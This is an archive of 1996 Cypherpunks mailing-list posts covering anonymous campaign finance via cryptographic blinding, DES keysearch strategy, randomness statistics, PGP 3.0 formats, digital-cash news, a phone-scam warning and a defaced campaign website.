"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 25 Oct 1996 07:24:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Stopping the buying of candidates [RANT]
In-Reply-To: <199610250358.WAA11949@earth.execpc.com>
Message-ID: <3270CC68.3962@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Matthew J. Miszewski wrote:
> > At 01:40 PM 10/24/96 +0000, Matthew J. Miszewski wrote:
> > >This is my last reply.  I guess I forgot your overarching theory.
> > >Reality, nah.

> > "My last reply"?  Sorta the rhetorical equivalent of "I think I heard my
> > mommy calling," huh?

> Yes Jim, your sparkling wit and incredibly convincing argument has
> made me run for cover.  Remind everyone what your "solution" is
> again.  In case everyone hasn't already *PLONK*ed you.
> Matthew J. Miszewski
> The information revolution has changed wealth: intellectual capital is now far more
> important than money.  -Walter Wriston

I apologize in advance for this.  I only wanted to comment on the Walter Wriston quote
above.  This is the kind of moronic crap they try to brainwash people with in school.
Didn't Hitler say something relevant like "You come at me with your bibles and etc.,
and I'll come with my tanks and guns, and we'll see who wins." (something like that).
Well, we "won", but it wasn't because "the pen is mightier than the sword", etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Fri, 25 Oct 1996 07:28:27 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: probability question for math-heads
In-Reply-To: <v03007803ae95511957ea@[207.167.93.63]>
Message-ID: <32706C62.3370@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> It obviously depends on your definitions of period, gap, clusters,
> patterns, etc. These would have to be pinned down before a precise answer
> could be given. For example, if the sequence is 30 digits long, or 5 digits
> long, etc.

yes ... the more one looks at the "random sequence" question, the more
questions that arise!  Again, referring to Knuth ... anything that takes
as many pages in one of his books as "Definition of Random Sequence" does
is certainly nontrivial.

A "gap" in my current inquiry is the number of bit positions between occurrances
of a specific bit-pattern.  My current investigation uses same-bit repetitions (00, 11),
but of course that generalizes to any specific n-bit pattern (e.g. we should get
the same results **in a perfect random sequence** if we count gaps between the
pattern "11" or the pattern "01".

> 
> But the general _framework_ for looking at this problem would probably be
> the Poisson distribution. That is, if the _expected_ ("average") number of
> gaps, runs, whatever, is "m", then the number "s" of actual gaps/runs that
> is 0, 1, 2, 3, 4, ...., n, is given by the Poisson distribution:
> 
> P [s; m] = (exp (-m))  (m ^ s)  / (s!)
> 
> (I read this like this: "The Poisson probability of seeing s occurrences
> given that m are expected is e to the minus m times m to the s divided by s
> factorial." I literally remember the formula from this verbal pattern,
> having used it much in my earlier career.)
> 

I'm going to have to chew on this .... but thanks for the Poisson hint.  Actually,
it looks like some graphs I've generated just might have some similarity to Poisson
distribution!!!  Bears more thought.

I certainly appreciate your time in replying in such depth.  It'll take a few days to
digest.

Thanks again,
Regards




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Fri, 25 Oct 1996 07:42:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [DES] Random vs Linear Keysearch.
In-Reply-To: <199610242027.NAA11010@toad.com>
Message-ID: <32706FA0.38BA@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:
> 
> Before I start, let me say that the software I'm writing will search a
> 'chunk' of keyspace linearly. The chunk will be somewhere around
> 31 bits long, which is what I think that my index low-end system
> (486, 33 MHz) could check overnight. I do intend to make the
> code interruptable, so that it can suspend and restart work on a
> given chunk. It's just that no result will be forthcoming until the chunk
> is finished (unless it finds the key). BTW, while it's *extremely*
> cpu intensive, it's not intensive in memory, disk, or communications
> usage.

I still maintain (and I'm working on some proposals --- 
it just takes more time than I have to form them well) that there
are strategies for partitioning the keyspace that are likely to be 
more efficient, given how likely it is that the key is 
constructed/derived/etc., using certain common techniques.

Now, if there is **NO** information as to how the key is constructed/derived, then
all the assumptions about a perfectly distributed keyspace result in the
conclusions we are all familiar with.  But you know the adage --- smarter, not
harder, and all that.  There WILL (almost always) be knowledge of the key 
generation techniques.  It is unlikely that geiger counters are in use by the
banks.  **IFF** there is a-priori knowledge of the key gen techniques, then 
it should be used if possible.

Now, I happen to be working on ONE SPECIFIC and common generation technique,
and there is some reason to believe that when it is used there is a more
efficient approach to partitioning.

There are a lot of caveats here ... and don't overgeneralize what I'm after -
I'm only espousing these ideas to stimulate other thought along the same
line.

Regardez.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 25 Oct 1996 05:27:31 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <oDZBwD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961025082555.4913B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Is Ray the genocidal maniac going to be represented by the legal team of
> Helena Kobrin and Cantor & Siegal?

If you don't watch it I'll have a pair of my staff represent him free of
charge.

> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 25 Oct 1996 08:11:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS]
Message-ID: <PaucwD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


American Banker, 10/24/96

Gonzalez pushing consumer safeguards for electronic banking

Rep. Henry B. Gonzalez called Wednesday for aggressive congressional
action to protect consumers in the emerging world of electronic banking.
Releasing a blueprint for legislative action, the Texas Democrat urged
Congress to: *Adopt public policy standards relating to privacy,
disclosure, access, equity, and financial reliability for electronic
banking products and services.

*Hold oversight hearings to assess how well the industry is serving the
consumer in these five areas.

*Enact laws if the industry's performance falls below minimum
congressional standards.

*Define financial transactions to include the exchange of financial
information as well as cash.

*Consider revising current consumer protection laws. "Many of the
federal consumer protection laws are nearly 30 years old, and they were
not designed to deal with the effects of these new technologies," said
Rep. Gonzalez, the House Banking Committee's ranking minority member.
The report, "Connecting Consumers: Consumer Issues and Emerging
Financial Technology," recommends subjecting banks and nonbanks to the
same laws and regulations in this area. Republican committee members and
banking regulators have been reluctant to issue rules that might hinder
the development of new electronic banking products.

[I.e., more regulation of electronic commernce. -DV]

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 25 Oct 1996 09:27:34 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.94.961025082555.4913B-100000@polaris>
Message-ID: <Pine.SUN.3.91.961025092106.15313D@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 25 Oct 1996, Black Unicorn wrote to Dimitri:

> If you don't watch it I'll have a pair of my staff represent
> [Ray] free of charge.

Now THAT would be a community service.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Fri, 25 Oct 1996 07:05:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: http://www.clintongore96.com/ is hacked.
Message-ID: <199610251405.KAA35316@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri Oct 25 10:02:50 1996
A much better job than the Dole-Kemp redirect, IMO. 
This guy really put some effort into the job, redoing all the sub-pages as 
well, it seems. For example, from the "health care" page:
[Picture of Hillary]
"Who better to pick your doctor than America's smartest woman?"

I am not certain how long this will stay up, so those with mirrors who are 
inclined should visit soon.
JMR


Regards, Jim Ray. -- DNRC Minister of Encryption Advocacy

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
jmr@shopmiami.com (Preferred)

Despite almost every experience I've ever had with federal authority,
I keep imagining its competence. -- John Perry Barlow

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMnDIkG1lp8bpvW01AQFsYAP/b+mSc+ROsYI/zfy241hhAiIasly1dCvw
OhjLe02Wl+cTg9dte9GV56QTDjwYA+cAsUOicl69PH3EX4SRq7T4n2HuRiY+OE3S
O+DUqtUNT9oCG7YQ8c0EiE6LGFK7AIvFZlnr6rcSkilRdZ87lAUSQTw4PhpUsCDL
XgMAkdykUyo=
=QUCw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Phillips" <djphill@umich.edu>
Date: Fri, 25 Oct 1996 07:11:03 -0700 (PDT)
To: dcsb@ai.mit.edu
Subject: When did Mondex ever claim to be anonymous?
Message-ID: <199610251410.KAA17470@rodan.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been researching the ways in which new payment systems incorporate
anonymity,  traceability, or identification, and the ways in which those
properties are presented by various people to various people.

Recently I've been looking particularly at Mondex. I remember receiving the
impression several years ago, when I first heard of Mondex, that it was
purporting to be anonymous, or at least private.  Now, however, I'm
beginning a systematic analysis of their press releases and of press
accounts, and I  find very few references to privacy.  One reference is in
their web page FAQ, which says that Mondex transactions are "private, just
like cash".  Simon Davies, in his complaint to the British Trading Standards
authorities, also cites this FAQ, claiming that it used to read "anonymous,
just like cash".  Davies also refers to an anonymity claim in the Mondex
Media Pack.  But I've found very little else that suggests that Mondex ever
hyped privacy. 

Can anyone give me an idea of how I got the idea that Mondex was making
privacy one of its selling points?

David Phillips
Visiting Instructor, Department of Communication Studies, University of Michigan
Doctoral Candidate, Annenberg School for Communication, University of
Pennsylvania





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 25 Oct 1996 10:08:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: http://www.clintongore96.com/ is hacked.
In-Reply-To: <199610251405.KAA35316@osceola.gate.net>
Message-ID: <m2eninufyb.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Jim" == Jim Ray <jmr@shopmiami.com> writes:

Jim> I am not certain how long this will stay up, so those with
Jim> mirrors who are inclined should visit soon.  JMR

It's still up as of 10AM Pacific Time. :-)

	http://www.miranova.com/~steve/clintongore96-hack/

	ftp://ftp.miranova.com/pub/people/Steve.Baur/clintongore96-hack.tar.gz

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence?  I think not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Fri, 25 Oct 1996 10:46:14 -0700 (PDT)
To: jon@worldbenders.com
Subject: KRAP in HotWired (article on William Reinsch)
Message-ID: <v03007801ae96ac76e423@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain


You might want to read an article by Brock Meeks in HotWired on
William Reinsch, who is charged with overseeing the new Key Recovery
Access Policy.

	http://www.muckraker.com/muckraker/96/43/index4a.html


Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael T. Babcock" <mbabcock@tyenet.com>
Date: Fri, 25 Oct 1996 08:14:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Fw: Area Code 809 Carribean Phone Scam
Message-ID: <199610251512.LAA02381@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@hks.net
Date: Fri Oct 25 11:13:26 1996
>> Just a heads-up about a current scam concerning numbers with "809" area 
>> codes.... spread the word!
>>
>> BE CAREFUL! This is a fraudulent message received the other day. 
>>
>> "Subject: Unpaid Account
>>
>> I am writing to give you a final 24 hours to settle your outstanding
>> account.  If I have not received the settlement in full, I will commence
>> legal proceedings without further delay.  If you would like to discuss 
this 
>> matter to avoid court action, call Mike Murray at Global Communications 
on 
>> 1-809-496-2700"
>>
>>
>> Subject: More Phone Scams
>>
>> The scam works basically like this: 
>>
>> You get home and notice that the message light is blinking on your 
answering 
>> machine.  You listen to the message, which has several wrinkles, but the
>> best one is the caller asks you to call a number beginning with Area 
Code 
>> 809 to receive information about a family member who has been ill.  
(They 
>> may also tell you someone has been arrested, died, you have won a 
wonderful 
>> prize, etc.)
>>
>> In any event, concerned or curious, you make the call. 
>>
>> Sometimes the phone is answered by someone who claims to speak broken
>> English.  (The idea is to keep you on the line to build up charges.)   
Or, 
>> sometimes you will just get a long recorded message.  The bottom line 
is, 
>> when your phone bill comes, you see this incredible charge, oftentimes 
more 
>> than $100.00!
>>
>> Crooks are using the 809 numbers as "pay-per-calls" and to get around 
the US 
>> Regulations and 900 number blocking.  Every time you call the number, 
they 
>> get a greatly inflated rebate from the foreign phone company.  Since 809
>> numbers are in the Caribbean, they aren't bound by the US 900# 
regulations 
>> that require them to warn you of the charge and the rate involved, and 
also 
>> a time period during which you may terminate the call without being 
charged. 
>>
>> The newest twist to this scam is to page people using the 809 numbers.  
With 
>> the new area code changes, people unknowingly are returning these calls.
>> When the bill comes, there are HUGE charges for the calls. 
>>
>> My suggestion is that no matter how you get the message, if you are 
asked to 
>> call a number with an 809 area code that you don't recognize, DON'T 
RETURN 
>> THE CALL!  It is bad enough that the criminal is invading your privacy,
>> don't let them invade your wallet as well! 
>>
>> Scams of this type are extremely hard to prosecute and since you did 
>> actually make the call, neither your local phone company or your long
>> distance carrier will want to get involved.  They'll tell you that they 
are 
>> simply providing the billing for the foreign company.  You end up trying 
to 
>> deal (over the phone) with a foreign phone company that feels they have 
done 
>> no wrong.  It can turn into a real nightmare!
>>
>> Please fwd this message to friends and let people be aware of it! 


Message courtesy Michael T. Babcock
http://www.cyberbeach.net/~mbabcock

Send a message with subj. SEND PUBLIC KEY for PGP KEY.
- -----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQC1AwUBMnDZIdtTCwP6TF2xAQHNFwUAgV+gvgGng69r8wbzCUqr3ckbjimKoByb
5YovMm0vAnS7Ub/gC/ECYT4A9HI971xi3J8pzbiR0fRMJhPYjJw+XCNQ0glN9EQU
wXONFDA4CmdUQaaKtzt2cx5HropnG90+ljBDE8f1xh/wEsqKpaBGwwRDefPlAKnl
xw4oj28RTlsJqLULKelBFSRBOrvDMk5/anpgPDnpmPqVJ2UcKoJHSw==
=eag2
- -----END PGP SIGNATURE-----

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMnDY8CoZzwIn1bdtAQEInQF+NOLgpfiHX0Z3qvuo5rtSh/lR4V1GKxYx
G3dP1QaWt9qhBpWVcjMEntsKdUlQkYHc
=Mo7x
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 25 Oct 1996 11:37:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS]
Message-ID: <3s2cwD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


American Banker: Wednesday, October 23, 1996

Citi Tech Chief Fears Massive Fraud on the Net

By JENNIFER KINGSON BLOOM

Few bankers know as much about data security as Colin Crook - and few are as
wary about the Internet.

"I personally do not do financial transactions on the Internet," said Mr.
Crook, Citicorp's senior technology officer.

At a telecommunications seminar in New York last week, Mr. Crook was generally
optimistic about the commercial potential of the Internet and its World Wide
Web, which he billed as both "a threat and a promise."

He is unsure when Citicorp will deem the Web secure enough for financial
transactions. Today's banks on the Web are conducting exercises in "risk
management," Mr. Crook said.

"The notion of electronic commerce is quickly losing its narrow focus as an
electronic payment system," he said. "It is now viewed in a much broader
context of electronic customer contact, multimedia, interactivity,
advertising, and enterprise restructuring."

At the seminar, sponsored by the Institute of Electrical and Electronics
Engineers of Piscataway, N.J., Mr. Crook underscored his concern that the
Internet offers wrongdoers the opportunity to "perpetrate fraud on a massive
scale."

While a waiter holding a customer's credit card in a restaurant has only a
limited time to pirate the number, Mr. Crook said, the "nonlinear" nature of
the Internet makes time less of a constraint. Thousands of credit card numbers
could be pilfered in an instant, he said, and precious corporate brand names
could be sullied.

"One disgruntled customer will have the ability to do enormous damage in
cyberspace," Mr. Crook said.

In one example of "electronic grafitti," Mr. Crook pointed to the infiltration
of the Central Intelligence Agency's Web site. "Hackers transformed it to the
'central agency for stupidity,'" he said. "And that was just a crass example."

Warnings aside, Mr. Crook expressed confidence that Internet commerce would
grow rapidly. He cited estimates that $20 million in sales took place on-line
in 1994, and $500 million in 1995. By 2000, he said, varying researchers
project $5 billion to $30 billion of transactions will be conducted
electronically, with 150 million to 200 million people using the Web.

"In technology, we tend to overestimate the short term and underestimate the
long term," said Mr. Crook.

"It's not clear to me that the case for electronic cash is very good" in the
short term, he said. "Plain old money is very effective."

Citicorp has spent years developing a hardware-based electronic cash scheme
known as the Electronic Money System. Sholom Rosen, the system's chief
architect, recently received another of several patents on the system.

Mr. Crook said digital cash technologies like Electronic Money System -- as
well as those of Digicash Inc. and Mondex -- were not ripe for widespread use,
despite the liberal attitudes of regulators.

"You would think this would be an amazing source of trauma" for the
regulators, he said.

In the near term, Mr. Crook said the Secure Electronic Transactions standard
approved by Visa and MasterCard held promise for safe credit card payments on
the Internet. And the development of E-check by the Financial Services
Technology Consortium (of which Citibank is a founding member) might be the
vehicle to project a check-like instrument into the on-line world.

Digital money, he said, "really holds the promise of a radical transformation
in the long term."

Trained as an engineer at the City of Liverpool's College of Technology in
England, Mr. Crook has been at Citicorp since 1990. He previously worked at
Motorola Corp., British Telecom, and Data General USA.

In 1981, he became the youngest person ever elected to the United Kingdom's
Royal Academy of Engineers.

"When you get into cyberspace, you can't trust anything," he said. "How do you
establish relationships with customers in cyberspace?"

Maintaining the interest of "the MTV generation" will be another challenge, he
said. "We're going to be dealing with a bunch of customers who get bored very
easily."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 26 Oct 1996 13:16:54 -0700 (PDT)
To: aba@dcs.ex.ac.uk
Subject: Re: pgp3 (was Re: MD5?)
In-Reply-To: <199610242332.AAA00532@server.test.net>
Message-ID: <199610251026.LAA01407@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



I just wrote:

> commercial, but at this point my understanding is that Derek Atkins is
> employed by SGI, and Colin Plumb by PGP Inc.  

As someone just pointed out, Derek works at Sun.  (I thought I heard
SGI chipped in too).

> No mention of pgp3 on www.pgp.com, mit; a web search reveals nothing.

An altavista serach found an Internet Draft entitled `PGP Message
Exchange Formats', however this appears to be a re-write of
pgformat.txt which is distributed with PGP, with some comments
explaining expansion directions. eg

:   The  public-key-encryption algorithm  is specified by  the public-key
:   cryptosystem (PKC) number of field (f). The following PKC numbers are
:   currently defined:
:
:      1 - RSA
:      255 - experimental
:
:   More PKC numbers  may be defined   in the future.   An implementation
:   need not support every PKC number.  The implementor must document the
:   PKC numbers understood by an implementation.

The only explicit mention of pgp 3.0 I saw in this document was this
somewhat out of date comment:

:   A new  release of PGP, known as  PGP 3.0, is  anticipated in 1995. To
:   the maximum extent possible, this version will be upwardly compatible
:   with version 2.x. At a minimum, PGP 3.0 will be able to read messages
:   and signatures produced by version 2.x.

Someone suggested to me that Derek posted a draft spec for PGP 3.0.
Anyone know of the whereabouts of this document.  WWW searches aren't
turning anything up for me, other than this:

: To: cypherpunks@toad.com
: From: frantz@netcom.com (Bill Frantz)
: Date: Fri, 26 Jul 1996 15:55:38 -0700
: Subject: Usenet Conference on Security
: 
: Just a few of the highlights:
: 
: (1) Ron Rivest speaking on SDSI
: [...]
: (7) Derek Atkins' description of the PGP Library API.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Fri, 25 Oct 1996 12:26:08 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Stopping the buying of candidates
Message-ID: <199610251922.PAA03919@caig1.att.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Fundamentally, you won't stop the buying of candidates unless
elected politicians have nothing to sell.  Technology won't fix that :-)

What technology _can_ do is make sure that bribes/contributions can be 
delivered quietly and untraceably, and that the contributors can let the
contributee know who gave the money and what sort of favors they're
interested in.  It can also simplify private coordination of soft money -
letting contributors know what newspapers to put privately-funded ads in,
generating astroturf letters to editors, announcing press releases from
"Citizens for Better Health Care", "independent political polling" to
find what issues the public thinks are important or could be
manipulated into caring about by a good campaign, "marketing focus groups"
by various front groups that can be leaked to the campaign, etc.
Then of course there's leaking rumors about the opponents'
Nasty Habits, complete with nicely-morphed pictures, 
providing lucrative speaking opportunities for TV "journalists", 
producing slick pre-produced video-bytes for the TV stations, etc.

You might get politicians to agree not to accept direct contributions
in return for giving them our tax money to spend, but that won't stop the
"advance auction of future services" - it'll just raise the stakes.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: c62op27@ibx.com (Victor Fiorillo)
Date: Fri, 25 Oct 1996 10:23:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Practice Codes
Message-ID: <9610251645.AA04196@ibx.com>
MIME-Version: 1.0
Content-Type: text/plain


What is a good source of "practice" ciphertext on the Web?

Victor F.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Thu, 24 Oct 1996 20:04:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: slander again
Message-ID: <2.2.32.19961025030210.008d2780@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sirs,

Have either of you read my post to the coderpunks list concerning
professionalism? I feel that it might be slightly applicable here. Surely
this has gone on long enough, and in enough of a public manner, that enough
people are sick of it.

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 25 Oct 1996 13:12:07 -0700 (PDT)
To: mjmiski@execpc.com
Subject: Re: Stopping the buying of candidates
Message-ID: <199610252011.NAA25158@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 1/1/96 +0000, Matthew J. Miszewski wrote:
>> >This is my last reply.  I guess I forgot your overarching theory. 
>> >Reality, nah.
>> 
>> "My last reply"?  Sorta the rhetorical equivalent of "I think I heard my 
>> mommy calling," huh?
>
>I wanted to take this crypto-irrelevant discussion off the list.

If you think the applications for the use of cryptographic blinding 
techniques is "crypto-irrelevant" then you're even more clueless than I'd 
previously surmised.  See Chaum's article of August 1992 if you doubt this.

>> >It's not a long shot.  When Bob the Big Bad Lobbyist comes into the 
>> >Senator's office and leads him to believe a donation will be made and 
>> >magically a sizeable one does, it can be reasonable infered from 
>> >whence it came. 
>> 
>> Except that "sizeable" donations won't appear.  If you don't understand 
>> this, you haven't been reading the descriptions of how the system would 
>> work.  Individual donations won't be identified either by name of amount; 
>> they'll be accumulated and only approximately reported.
>
>They will have to eventually appear.  

The money will eventually be spendable.  But information as to the number 
and timing and size of the donations will be disguised using blinding 
techniques.  Re-read my comments.


>In reality vendors have to get 
>paid real money.  Not approximations of money.  It would be like 
>getting a new job and your boss telling you that he would pay you 
>some money at randomly occuring times.  That would be a fun way to 
>budget.

Nobody said politics had to be easy.  They'll adjust to the new reality; 
they always do.


>My point is, Jim, that your idea is unworkable in reality. 

Since you obviously don't understand it, and you also don't understand 
cryptographic blinding, why should anybody pay attention to your opinion?


> In theory it would be nice to have complete anonymity.  In reality it won't 
>work.

Always overstating your case, I see.  For the application I described, it 
isn't necessary to have "complete anonymity."  What's needed is a healthy 
dose of fog and uncertainty, making sure that the candidates can't trust any 
claim that a donor has made a donation of any particular size.

>  Take, for example, the current attempt at finance reform.  X 
>cant give Y over $500 per State Assembly race.  What if X holds a 
>fundraiser for Y and invites their entire executive board.  What if X 
>is at a legislative conference and suggests that all the participants 
>give Y at least $500.  Do you plan on outlawing X's Freedom of 
>Speech? 

Since today's campaign contribution limits seem to be inherently a violation 
of freedom of speech, why not embrace my solution, which doesn't do this?

> A self-proclaimed Constitutionalist like yourself should 
>hold individual freedom in a paramount position.

"Constitutionalist"?  Hell no!  I subscribe to the idea inherent in the 
joke, "The Constitution may be bad government, but it's better than what we 
have now."  I think there's no doubt that a government based scrupulously on 
the US Constitution would be a vast improvement.  However, we've never had 
such a thing.


>> > In the real world, politicians have access to the 
>> >names and addresses of people who regularly donate to political 
>> >campaigns. 
>> 
>> I wonder how many people will still be donating if they can't get their 
name 
>> associated with the donation...
>> 
>
>My point has always been that they will.  Even if you totally blind 
>the donation, inuendo backed up with any modicum of external proof 
>will do. 

Such "proof" will be easily faked, BTW, which is part of the reason this 
system will work so well.  I could go to some candidate and claim that I'd 
made a $10,000 contribution to his campaign.  Let's say I'd show him a 
(forged) cancelled check.  What could he do about it?  Would he risk pissing 
off a valuable contributor?


> The minutes of the executive board meeting, the cancelled 
>check, whatever.  Even in a technically sound system, human inginuity 
>will prevail.

Which is exactly why the faking process will be so easily accomplished.

>All lobbies will continue to give.

And, obviously, they'll claim they gave far more than the really did.  This 
is okay, it'll destroy the credibility of anyone who claims to have made a 
contribution.

> They seek access and control.  
>Politicians know the interests with the wherewithall to fund a 
>campaign.  They know Right-to-life wont fund a pro-choice candidate.  
>Labor Unions will seek out pro-labor candidates and business will 
>find business friendly candidates.  You can make it completely 
>anonymous with NO POSSIBLE WAY to know.  It would make NO difference.

Sure about that?  Let me provide some contrary evidence.  Every once in a 
while, you'll see on the TV networks a report about corporate (and labor, 
BTW) campaign giving, and they will occasionally point out that a given 
corporation (or PAC, etc.) gives money BOTH to the Republicans and the 
Democrats.  They have no reason to do this, except that they think they will 
get some benefit in the future from the "access" that contribution produces. 
 This is particularly true, since the identities of all contributors are 
currently public knowledge.  
If an organization expected no direct return benefit from making 
contributions (for example, if the donations were adequately blinded), it 
would make them ONLY to the side they considered would best help them, and 
not the opponents.  If they thought it necessary, they would lie about 
making a contribution to the other candidate.


>> And it'll be even less when this system is adopted.
>
>No it wont.  If the good Senator supports business with his votes, 
>business has to support them with their money.  It is in THEIR best 
>interest.

I don't think there's necessarily anything wrong with this AS LONG AS the 
system makes it difficult or impossible to identifiably reward contributors.


>> >My fault.  I forget whom I was replying to.  Of course my reply above 
>> >was in response to your question about developing a "working" system. 
>> >Have fun in your politicianless world (with no physical 
>> >infrastructure, information infrastructure, national defense, etc.) 
>> 
>> Who needs "national defense"?  As for "information infrastructure, are you 
>> under the illusion that private industry couldn't do it?  Hell, it DOES 
it!  
>> The Internet is essentially fully privatized, NOW.
>
>Fully privitized?  Jim, I have been on the net since the late 80's.  
>I know how it started and what it looks like today.  If you know as 
>little about the internet as you do about politics maybe you do not 
>know what the first budget item in any company is to go in tough 
>times.  There is little public interest in private industry. 

I stand by my original statement.  True, the origins of the Internet were 
primarily government-sponsored and financed, but by now the vast majority of 
the traffic goes through privatized connections (Sprint, MCI, AT+T), and 
most of the users access the web through private (not government owned or 
